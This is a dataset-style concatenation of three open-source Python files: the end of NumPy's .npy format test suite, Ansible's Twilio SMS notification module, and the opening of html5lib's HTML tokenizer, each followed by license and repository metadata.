'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '>i2', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '<u4', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '<u4', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '<u4', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '<u4', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '<u4', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '<u4', 
'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '>u4', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '>u4', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '>u4', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '>u4', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '>u4', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '>u4', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '<i4', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '<i4', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '<i4', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '<i4', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '<i4', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '<i4', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '>i4', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '>i4', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '>i4', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '>i4', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '>i4', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '>i4', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '<u8', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '<u8', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '<u8', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '<u8', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '<u8', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '<u8', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '>u8', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '>u8', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '>u8', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '>u8', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '>u8', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '>u8', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '<i8', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '<i8', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '<i8', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '<i8', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '<i8', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '<i8', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '>i8', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '>i8', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '>i8', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '>i8', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '>i8', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '>i8', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '<f4', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '<f4', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '<f4', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '<f4', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '<f4', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '<f4', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '>f4', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '>f4', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '>f4', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '>f4', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '>f4', 'fortran_order': 
True, 'shape': (5, 3)} \n" "F\x00{'descr': '>f4', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '<f8', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '<f8', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '<f8', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '<f8', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '<f8', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '<f8', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '>f8', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '>f8', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '>f8', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '>f8', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '>f8', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '>f8', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '<c8', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '<c8', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '<c8', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '<c8', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '<c8', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '<c8', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '>c8', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '>c8', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '>c8', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '>c8', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '>c8', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '>c8', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '<c16', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '<c16', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '<c16', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '<c16', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '<c16', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '<c16', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '>c16', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '>c16', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '>c16', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '>c16', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '>c16', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '>c16', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': 'O', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': 'O', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': 'O', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': 'O', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': 'O', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': 'O', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': 'O', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': 'O', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': 'O', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': 'O', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': 'O', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': 'O', 'fortran_order': False, 'shape': (3, 3)} \n" "v\x00{'descr': [('x', '<i4', (2,)), ('y', '<f8', (2, 2)), ('z', '|u1')],\n 'fortran_order': False,\n 'shape': (2,)} \n" "\x16\x02{'descr': [('x', '<i4', (2,)),\n ('Info',\n [('value', '<c16'),\n ('y2', '<f8'),\n ('Info2',\n [('name', '|S2'),\n ('value', '<c16', (2,)),\n 
('y3', '<f8', (2,)),\n ('z3', '<u4', (2,))]),\n ('name', '|S2'),\n ('z2', '|b1')]),\n ('color', '|S2'),\n ('info', [('Name', '<U8'), ('Value', '<c16')]),\n ('y', '<f8', (2, 2)),\n ('z', '|u1')],\n 'fortran_order': False,\n 'shape': (2,)} \n" "v\x00{'descr': [('x', '>i4', (2,)), ('y', '>f8', (2, 2)), ('z', '|u1')],\n 'fortran_order': False,\n 'shape': (2,)} \n" "\x16\x02{'descr': [('x', '>i4', (2,)),\n ('Info',\n [('value', '>c16'),\n ('y2', '>f8'),\n ('Info2',\n [('name', '|S2'),\n ('value', '>c16', (2,)),\n ('y3', '>f8', (2,)),\n ('z3', '>u4', (2,))]),\n ('name', '|S2'),\n ('z2', '|b1')]),\n ('color', '|S2'),\n ('info', [('Name', '>U8'), ('Value', '>c16')]),\n ('y', '>f8', (2, 2)),\n ('z', '|u1')],\n 'fortran_order': False,\n 'shape': (2,)} \n" ''' import sys import os import shutil import tempfile import warnings from io import BytesIO import numpy as np from numpy.compat import asbytes, asbytes_nested, sixu from numpy.testing import ( run_module_suite, assert_, assert_array_equal, assert_raises, raises, dec, SkipTest ) from numpy.lib import format tempdir = None # Module-level setup. def setup_module(): global tempdir tempdir = tempfile.mkdtemp() def teardown_module(): global tempdir if tempdir is not None and os.path.isdir(tempdir): shutil.rmtree(tempdir) tempdir = None # Generate some basic arrays to test with. scalars = [ np.uint8, np.int8, np.uint16, np.int16, np.uint32, np.int32, np.uint64, np.int64, np.float32, np.float64, np.complex64, np.complex128, object, ] basic_arrays = [] for scalar in scalars: for endian in '<>': dtype = np.dtype(scalar).newbyteorder(endian) basic = np.arange(1500).astype(dtype) basic_arrays.extend([ # Empty np.array([], dtype=dtype), # Rank-0 np.array(10, dtype=dtype), # 1-D basic, # 2-D C-contiguous basic.reshape((30, 50)), # 2-D F-contiguous basic.reshape((30, 50)).T, # 2-D non-contiguous basic.reshape((30, 50))[::-1, ::2], ]) # More complicated record arrays. 
# This is the structure of the table used for plain objects: # # +-+-+-+ # |x|y|z| # +-+-+-+ # Structure of a plain array description: Pdescr = [ ('x', 'i4', (2,)), ('y', 'f8', (2, 2)), ('z', 'u1')] # A plain list of tuples with values for testing: PbufferT = [ # x y z ([3, 2], [[6., 4.], [6., 4.]], 8), ([4, 3], [[7., 5.], [7., 5.]], 9), ] # This is the structure of the table used for nested objects (DON'T PANIC!): # # +-+---------------------------------+-----+----------+-+-+ # |x|Info |color|info |y|z| # | +-----+--+----------------+----+--+ +----+-----+ | | # | |value|y2|Info2 |name|z2| |Name|Value| | | # | | | +----+-----+--+--+ | | | | | | | # | | | |name|value|y3|z3| | | | | | | | # +-+-----+--+----+-----+--+--+----+--+-----+----+-----+-+-+ # # The corresponding nested array description: Ndescr = [ ('x', 'i4', (2,)), ('Info', [ ('value', 'c16'), ('y2', 'f8'), ('Info2', [ ('name', 'S2'), ('value', 'c16', (2,)), ('y3', 'f8', (2,)), ('z3', 'u4', (2,))]), ('name', 'S2'), ('z2', 'b1')]), ('color', 'S2'), ('info', [ ('Name', 'U8'), ('Value', 'c16')]), ('y', 'f8', (2, 2)), ('z', 'u1')] NbufferT = [ # x Info color info y z # value y2 Info2 name z2 Name Value # name value y3 z3 ([3, 2], (6j, 6., ('nn', [6j, 4j], [6., 4.], [1, 2]), 'NN', True), 'cc', ('NN', 6j), [[6., 4.], [6., 4.]], 8), ([4, 3], (7j, 7., ('oo', [7j, 5j], [7., 5.], [2, 1]), 'OO', False), 'dd', ('OO', 7j), [[7., 5.], [7., 5.]], 9), ] record_arrays = [ np.array(PbufferT, dtype=np.dtype(Pdescr).newbyteorder('<')), np.array(NbufferT, dtype=np.dtype(Ndescr).newbyteorder('<')), np.array(PbufferT, dtype=np.dtype(Pdescr).newbyteorder('>')), np.array(NbufferT, dtype=np.dtype(Ndescr).newbyteorder('>')), ] #BytesIO that reads a random number of bytes at a time class BytesIOSRandomSize(BytesIO): def read(self, size=None): import random size = random.randint(1, size) return super(BytesIOSRandomSize, self).read(size) def roundtrip(arr): f = BytesIO() format.write_array(f, arr) f2 = BytesIO(f.getvalue()) arr2 = format.read_array(f2) return arr2 def roundtrip_randsize(arr): f = BytesIO() format.write_array(f, arr) f2 = BytesIOSRandomSize(f.getvalue()) arr2 = format.read_array(f2) return arr2 def roundtrip_truncated(arr): f = BytesIO() format.write_array(f, arr) #BytesIO is one byte short f2 = BytesIO(f.getvalue()[0:-1]) arr2 = format.read_array(f2) return arr2 def assert_equal_(o1, o2): assert_(o1 == o2) def test_roundtrip(): for arr in basic_arrays + record_arrays: arr2 = roundtrip(arr) yield assert_array_equal, arr, arr2 def test_roundtrip_randsize(): for arr in basic_arrays + record_arrays: if arr.dtype != object: arr2 = roundtrip_randsize(arr) yield assert_array_equal, arr, arr2 def test_roundtrip_truncated(): for arr in basic_arrays: if arr.dtype != object: yield assert_raises, ValueError, roundtrip_truncated, arr def test_long_str(): # check items larger than internal buffer size, gh-4027 long_str_arr = np.ones(1, dtype=np.dtype((str, format.BUFFER_SIZE + 1))) long_str_arr2 = roundtrip(long_str_arr) assert_array_equal(long_str_arr, long_str_arr2) @dec.slow def test_memmap_roundtrip(): # Fixme: test crashes nose on windows. if not (sys.platform == 'win32' or sys.platform == 'cygwin'): for arr in basic_arrays + record_arrays: if arr.dtype.hasobject: # Skip these since they can't be mmap'ed. continue # Write it out normally and through mmap. 
nfn = os.path.join(tempdir, 'normal.npy') mfn = os.path.join(tempdir, 'memmap.npy') fp = open(nfn, 'wb') try: format.write_array(fp, arr) finally: fp.close() fortran_order = ( arr.flags.f_contiguous and not arr.flags.c_contiguous) ma = format.open_memmap(mfn, mode='w+', dtype=arr.dtype, shape=arr.shape, fortran_order=fortran_order) ma[...] = arr del ma # Check that both of these files' contents are the same. fp = open(nfn, 'rb') normal_bytes = fp.read() fp.close() fp = open(mfn, 'rb') memmap_bytes = fp.read() fp.close() yield assert_equal_, normal_bytes, memmap_bytes # Check that reading the file using memmap works. ma = format.open_memmap(nfn, mode='r') del ma def test_compressed_roundtrip(): arr = np.random.rand(200, 200) npz_file = os.path.join(tempdir, 'compressed.npz') np.savez_compressed(npz_file, arr=arr) arr1 = np.load(npz_file)['arr'] assert_array_equal(arr, arr1) def test_python2_python3_interoperability(): if sys.version_info[0] >= 3: fname = 'win64python2.npy' else: fname = 'python3.npy' path = os.path.join(os.path.dirname(__file__), 'data', fname) data = np.load(path) assert_array_equal(data, np.ones(2)) def test_pickle_python2_python3(): # Test that loading object arrays saved on Python 2 works both on # Python 2 and Python 3 and vice versa data_dir = os.path.join(os.path.dirname(__file__), 'data') if sys.version_info[0] >= 3: xrange = range else: import __builtin__ xrange = __builtin__.xrange expected = np.array([None, xrange, sixu('\u512a\u826f'), asbytes('\xe4\xb8\x8d\xe8\x89\xaf')], dtype=object) for fname in ['py2-objarr.npy', 'py2-objarr.npz', 'py3-objarr.npy', 'py3-objarr.npz']: path = os.path.join(data_dir, fname) if (fname.endswith('.npz') and sys.version_info[0] == 2 and sys.version_info[1] < 7): # Reading object arrays directly from zipfile appears to fail # on Py2.6, see cfae0143b4 continue for encoding in ['bytes', 'latin1']: if (sys.version_info[0] >= 3 and sys.version_info[1] < 4 and encoding == 'bytes'): # The bytes encoding is available starting from Python 3.4 continue data_f = np.load(path, encoding=encoding) if fname.endswith('.npz'): data = data_f['x'] data_f.close() else: data = data_f if sys.version_info[0] >= 3: if encoding == 'latin1' and fname.startswith('py2'): assert_(isinstance(data[3], str)) assert_array_equal(data[:-1], expected[:-1]) # mojibake occurs assert_array_equal(data[-1].encode(encoding), expected[-1]) else: assert_(isinstance(data[3], bytes)) assert_array_equal(data, expected) else: assert_array_equal(data, expected) if sys.version_info[0] >= 3: if fname.startswith('py2'): if fname.endswith('.npz'): data = np.load(path) assert_raises(UnicodeError, data.__getitem__, 'x') data.close() data = np.load(path, fix_imports=False, encoding='latin1') assert_raises(ImportError, data.__getitem__, 'x') data.close() else: assert_raises(UnicodeError, np.load, path) assert_raises(ImportError, np.load, path, encoding='latin1', fix_imports=False) def test_pickle_disallow(): data_dir = os.path.join(os.path.dirname(__file__), 'data') path = os.path.join(data_dir, 'py2-objarr.npy') assert_raises(ValueError, np.load, path, allow_pickle=False, encoding='latin1') path = os.path.join(data_dir, 'py2-objarr.npz') f = np.load(path, allow_pickle=False, encoding='latin1') assert_raises(ValueError, f.__getitem__, 'x') path = os.path.join(tempdir, 'pickle-disabled.npy') assert_raises(ValueError, np.save, path, np.array([None], dtype=object), allow_pickle=False) def test_version_2_0(): f = BytesIO() # requires more than 2 byte for header dt = [(("%d" % i) * 100, 
float) for i in range(500)] d = np.ones(1000, dtype=dt) format.write_array(f, d, version=(2, 0)) with warnings.catch_warnings(record=True) as w: warnings.filterwarnings('always', '', UserWarning) format.write_array(f, d) assert_(w[0].category is UserWarning) f.seek(0) n = format.read_array(f) assert_array_equal(d, n) # 1.0 requested but data cannot be saved this way assert_raises(ValueError, format.write_array, f, d, (1, 0)) def test_version_2_0_memmap(): # requires more than 2 byte for header dt = [(("%d" % i) * 100, float) for i in range(500)] d = np.ones(1000, dtype=dt) tf = tempfile.mktemp('', 'mmap', dir=tempdir) # 1.0 requested but data cannot be saved this way assert_raises(ValueError, format.open_memmap, tf, mode='w+', dtype=d.dtype, shape=d.shape, version=(1, 0)) ma = format.open_memmap(tf, mode='w+', dtype=d.dtype, shape=d.shape, version=(2, 0)) ma[...] = d del ma with warnings.catch_warnings(record=True) as w: warnings.filterwarnings('always', '', UserWarning) ma = format.open_memmap(tf, mode='w+', dtype=d.dtype, shape=d.shape, version=None) assert_(w[0].category is UserWarning) ma[...] = d del ma ma = format.open_memmap(tf, mode='r') assert_array_equal(ma, d) def test_write_version(): f = BytesIO() arr = np.arange(1) # These should pass. format.write_array(f, arr, version=(1, 0)) format.write_array(f, arr) format.write_array(f, arr, version=None) format.write_array(f, arr) format.write_array(f, arr, version=(2, 0)) format.write_array(f, arr) # These should all fail. bad_versions = [ (1, 1), (0, 0), (0, 1), (2, 2), (255, 255), ] for version in bad_versions: try: format.write_array(f, arr, version=version) except ValueError: pass else: raise AssertionError("we should have raised a ValueError for the bad version %r" % (version,)) bad_version_magic = asbytes_nested([ '\x93NUMPY\x01\x01', '\x93NUMPY\x00\x00', '\x93NUMPY\x00\x01', '\x93NUMPY\x02\x00', '\x93NUMPY\x02\x02', '\x93NUMPY\xff\xff', ]) malformed_magic = asbytes_nested([ '\x92NUMPY\x01\x00', '\x00NUMPY\x01\x00', '\x93numpy\x01\x00', '\x93MATLB\x01\x00', '\x93NUMPY\x01', '\x93NUMPY', '', ]) def test_read_magic(): s1 = BytesIO() s2 = BytesIO() arr = np.ones((3, 6), dtype=float) format.write_array(s1, arr, version=(1, 0)) format.write_array(s2, arr, version=(2, 0)) s1.seek(0) s2.seek(0) version1 = format.read_magic(s1) version2 = format.read_magic(s2) assert_(version1 == (1, 0)) assert_(version2 == (2, 0)) assert_(s1.tell() == format.MAGIC_LEN) assert_(s2.tell() == format.MAGIC_LEN) def test_read_magic_bad_magic(): for magic in malformed_magic: f = BytesIO(magic) yield raises(ValueError)(format.read_magic), f def test_read_version_1_0_bad_magic(): for magic in bad_version_magic + malformed_magic: f = BytesIO(magic) yield raises(ValueError)(format.read_array), f def test_bad_magic_args(): assert_raises(ValueError, format.magic, -1, 1) assert_raises(ValueError, format.magic, 256, 1) assert_raises(ValueError, format.magic, 1, -1) assert_raises(ValueError, format.magic, 1, 256) def test_large_header(): s = BytesIO() d = {'a': 1, 'b': 2} format.write_array_header_1_0(s, d) s = BytesIO() d = {'a': 1, 'b': 2, 'c': 'x'*256*256} assert_raises(ValueError, format.write_array_header_1_0, s, d) def test_read_array_header_1_0(): s = BytesIO() arr = np.ones((3, 6), dtype=float) format.write_array(s, arr, version=(1, 0)) s.seek(format.MAGIC_LEN) shape, fortran, dtype = format.read_array_header_1_0(s) assert_((shape, fortran, dtype) == ((3, 6), False, float)) def test_read_array_header_2_0(): s = BytesIO() arr = np.ones((3, 6), dtype=float) 
format.write_array(s, arr, version=(2, 0)) s.seek(format.MAGIC_LEN) shape, fortran, dtype = format.read_array_header_2_0(s) assert_((shape, fortran, dtype) == ((3, 6), False, float)) def test_bad_header(): # header of length less than 2 should fail s = BytesIO() assert_raises(ValueError, format.read_array_header_1_0, s) s = BytesIO(asbytes('1')) assert_raises(ValueError, format.read_array_header_1_0, s) # header shorter than indicated size should fail s = BytesIO(asbytes('\x01\x00')) assert_raises(ValueError, format.read_array_header_1_0, s) # headers without the exact keys required should fail d = {"shape": (1, 2), "descr": "x"} s = BytesIO() format.write_array_header_1_0(s, d) assert_raises(ValueError, format.read_array_header_1_0, s) d = {"shape": (1, 2), "fortran_order": False, "descr": "x", "extrakey": -1} s = BytesIO() format.write_array_header_1_0(s, d) assert_raises(ValueError, format.read_array_header_1_0, s) def test_large_file_support(): if (sys.platform == 'win32' or sys.platform == 'cygwin'): raise SkipTest("Unknown if Windows has sparse filesystems") # try creating a large sparse file tf_name = os.path.join(tempdir, 'sparse_file') try: # seek past end would work too, but linux truncate somewhat # increases the chances that we have a sparse filesystem and can # avoid actually writing 5GB import subprocess as sp sp.check_call(["truncate", "-s", "5368709120", tf_name]) except: raise SkipTest("Could not create 5GB large file") # write a small array to the end with open(tf_name, "wb") as f: f.seek(5368709120) d = np.arange(5) np.save(f, d) # read it back with open(tf_name, "rb") as f: f.seek(5368709120) r = np.load(f) assert_array_equal(r, d) if __name__ == "__main__": run_module_suite()
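# ---------------------------------------------------------------------------
# Editor's note: the sketch below is not part of the original test suite.  It
# is a minimal illustration of the write/read round trip that the tests above
# exercise, using only names already imported in this module (BytesIO, np,
# format, assert_array_equal).  The helper name is made up for illustration.

def _format_roundtrip_sketch():
    # Write a small, explicitly little-endian array, then inspect the magic
    # string and the version 1.0 header before reading the data back.
    buf = BytesIO()
    arr = np.arange(12, dtype='<i4').reshape(3, 4)
    format.write_array(buf, arr, version=(1, 0))

    buf.seek(0)
    assert format.read_magic(buf) == (1, 0)   # consumes '\x93NUMPY\x01\x00'
    shape, fortran, dtype = format.read_array_header_1_0(buf)
    assert (shape, fortran, dtype) == ((3, 4), False, np.dtype('<i4'))

    buf.seek(0)  # read_array expects to start at the magic string
    assert_array_equal(format.read_array(buf), arr)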
gpl-3.0
jcpowermac/ansible
lib/ansible/modules/notification/twilio.py
47
5594
#!/usr/bin/python
# -*- coding: utf-8 -*-

# (c) 2015, Matt Makai <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

from __future__ import absolute_import, division, print_function
__metaclass__ = type

ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'community'}

DOCUMENTATION = '''
---
version_added: "1.6"
module: twilio
short_description: Sends a text message to a mobile phone through Twilio.
description:
   - Sends a text message to a phone number through the Twilio messaging API.
notes:
   - This module is non-idempotent because it sends a text message through the
     external API. It is idempotent only in the case that the module fails.
   - Like the other notification modules, this one requires an external
     dependency to work. In this case, you'll need a Twilio account with
     a purchased or verified phone number to send the text message.
options:
  account_sid:
    description: user's Twilio account SID found on the account page
    required: true
  auth_token:
    description: user's Twilio authentication token
    required: true
  msg:
    description: the body of the text message
    required: true
  to_number:
    description: one or more phone numbers to send the text message to, format +15551112222
    required: true
  from_number:
    description: the Twilio number to send the text message from, format +15551112222
    required: true
  media_url:
    description: a URL with a picture, video or sound clip to send with an MMS
      (multimedia message) instead of a plain SMS
    required: false
author: "Matt Makai (@makaimc)"
'''

EXAMPLES = '''
# send an SMS about the build status to (555) 303 5681
# note: replace account_sid and auth_token values with your credentials
# and you have to have the 'from_number' on your Twilio account
- twilio:
    msg: All servers with webserver role are now configured.
    account_sid: ACXXXXXXXXXXXXXXXXX
    auth_token: ACXXXXXXXXXXXXXXXXX
    from_number: +15552014545
    to_number: +15553035681
  delegate_to: localhost

# send an SMS to multiple phone numbers about the deployment
# note: replace account_sid and auth_token values with your credentials
# and you have to have the 'from_number' on your Twilio account
- twilio:
    msg: This server configuration is now complete.
    account_sid: ACXXXXXXXXXXXXXXXXX
    auth_token: ACXXXXXXXXXXXXXXXXX
    from_number: +15553258899
    to_number:
      - +15551113232
      - +12025551235
      - +19735559010
  delegate_to: localhost

# send an MMS to a single recipient with an update on the deployment
# and an image of the results
# note: replace account_sid and auth_token values with your credentials
# and you have to have the 'from_number' on your Twilio account
- twilio:
    msg: Deployment complete!
    account_sid: ACXXXXXXXXXXXXXXXXX
    auth_token: ACXXXXXXXXXXXXXXXXX
    from_number: +15552014545
    to_number: +15553035681
    media_url: https://demo.twilio.com/logo.png
  delegate_to: localhost
'''

# =======================================
# twilio module support methods
#
import json

from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six.moves.urllib.parse import urlencode
from ansible.module_utils.urls import fetch_url


def post_twilio_api(module, account_sid, auth_token, msg, from_number,
                    to_number, media_url=None):
    URI = "https://api.twilio.com/2010-04-01/Accounts/%s/Messages.json" \
        % (account_sid,)
    AGENT = "Ansible"

    data = {'From': from_number, 'To': to_number, 'Body': msg}
    if media_url:
        data['MediaUrl'] = media_url
    encoded_data = urlencode(data)

    headers = {'User-Agent': AGENT,
               'Content-type': 'application/x-www-form-urlencoded',
               'Accept': 'application/json',
               }

    # Hack module params to have the Basic auth params that fetch_url expects
    module.params['url_username'] = account_sid.replace('\n', '')
    module.params['url_password'] = auth_token.replace('\n', '')

    return fetch_url(module, URI, data=encoded_data, headers=headers)


# =======================================
# Main
#

def main():

    module = AnsibleModule(
        argument_spec=dict(
            account_sid=dict(required=True),
            auth_token=dict(required=True, no_log=True),
            msg=dict(required=True),
            from_number=dict(required=True),
            to_number=dict(required=True),
            media_url=dict(default=None, required=False),
        ),
        supports_check_mode=True
    )

    account_sid = module.params['account_sid']
    auth_token = module.params['auth_token']
    msg = module.params['msg']
    from_number = module.params['from_number']
    to_number = module.params['to_number']
    media_url = module.params['media_url']

    if not isinstance(to_number, list):
        to_number = [to_number]

    for number in to_number:
        r, info = post_twilio_api(module, account_sid, auth_token, msg,
                                  from_number, number, media_url)
        if info['status'] not in [200, 201]:
            body_message = "unknown error"
            if 'body' in info:
                body = json.loads(info['body'])
                body_message = body['message']
            module.fail_json(msg="unable to send message to %s: %s" % (number, body_message))

    module.exit_json(msg=msg, changed=False)


if __name__ == '__main__':
    main()
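# ---------------------------------------------------------------------------
# Editor's note: the helper below is not part of the original module.  It is a
# minimal sketch of the request that post_twilio_api() hands to fetch_url,
# spelled out so the wire format is visible outside a playbook.  The function
# name, the 'your_auth_token' value and the default numbers (taken from the
# EXAMPLES above) are placeholders for illustration only.

def _twilio_request_sketch(account_sid='ACXXXXXXXXXXXXXXXXX',
                           auth_token='your_auth_token',
                           from_number='+15552014545',
                           to_number='+15553035681',
                           msg='hello from ansible'):
    """Return the (url, headers, body) triple the module would POST."""
    import base64

    url = "https://api.twilio.com/2010-04-01/Accounts/%s/Messages.json" % account_sid
    body = urlencode({'From': from_number, 'To': to_number, 'Body': msg})
    # fetch_url builds this header itself from url_username/url_password;
    # it is written out here only to show what goes over the wire.
    token = base64.b64encode(('%s:%s' % (account_sid, auth_token)).encode('utf-8'))
    headers = {
        'User-Agent': 'Ansible',
        'Content-type': 'application/x-www-form-urlencoded',
        'Accept': 'application/json',
        'Authorization': 'Basic %s' % token.decode('ascii'),
    }
    return url, headers, body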
gpl-3.0
superchilli/webapp
venv/lib/python2.7/site-packages/html5lib/tokenizer.py
1710
76929
from __future__ import absolute_import, division, unicode_literals try: chr = unichr # flake8: noqa except NameError: pass from collections import deque from .constants import spaceCharacters from .constants import entities from .constants import asciiLetters, asciiUpper2Lower from .constants import digits, hexDigits, EOF from .constants import tokenTypes, tagTokenTypes from .constants import replacementCharacters from .inputstream import HTMLInputStream from .trie import Trie entitiesTrie = Trie(entities) class HTMLTokenizer(object): """ This class takes care of tokenizing HTML. * self.currentToken Holds the token that is currently being processed. * self.state Holds a reference to the method to be invoked... XXX * self.stream Points to HTMLInputStream object. """ def __init__(self, stream, encoding=None, parseMeta=True, useChardet=True, lowercaseElementName=True, lowercaseAttrName=True, parser=None): self.stream = HTMLInputStream(stream, encoding, parseMeta, useChardet) self.parser = parser # Perform case conversions? self.lowercaseElementName = lowercaseElementName self.lowercaseAttrName = lowercaseAttrName # Setup the initial tokenizer state self.escapeFlag = False self.lastFourChars = [] self.state = self.dataState self.escape = False # The current token being created self.currentToken = None super(HTMLTokenizer, self).__init__() def __iter__(self): """ This is where the magic happens. We do our usually processing through the states and when we have a token to return we yield the token which pauses processing until the next token is requested. """ self.tokenQueue = deque([]) # Start processing. When EOF is reached self.state will return False # instead of True and the loop will terminate. while self.state(): while self.stream.errors: yield {"type": tokenTypes["ParseError"], "data": self.stream.errors.pop(0)} while self.tokenQueue: yield self.tokenQueue.popleft() def consumeNumberEntity(self, isHex): """This function returns either U+FFFD or the character based on the decimal or hexadecimal representation. It also discards ";" if present. If not 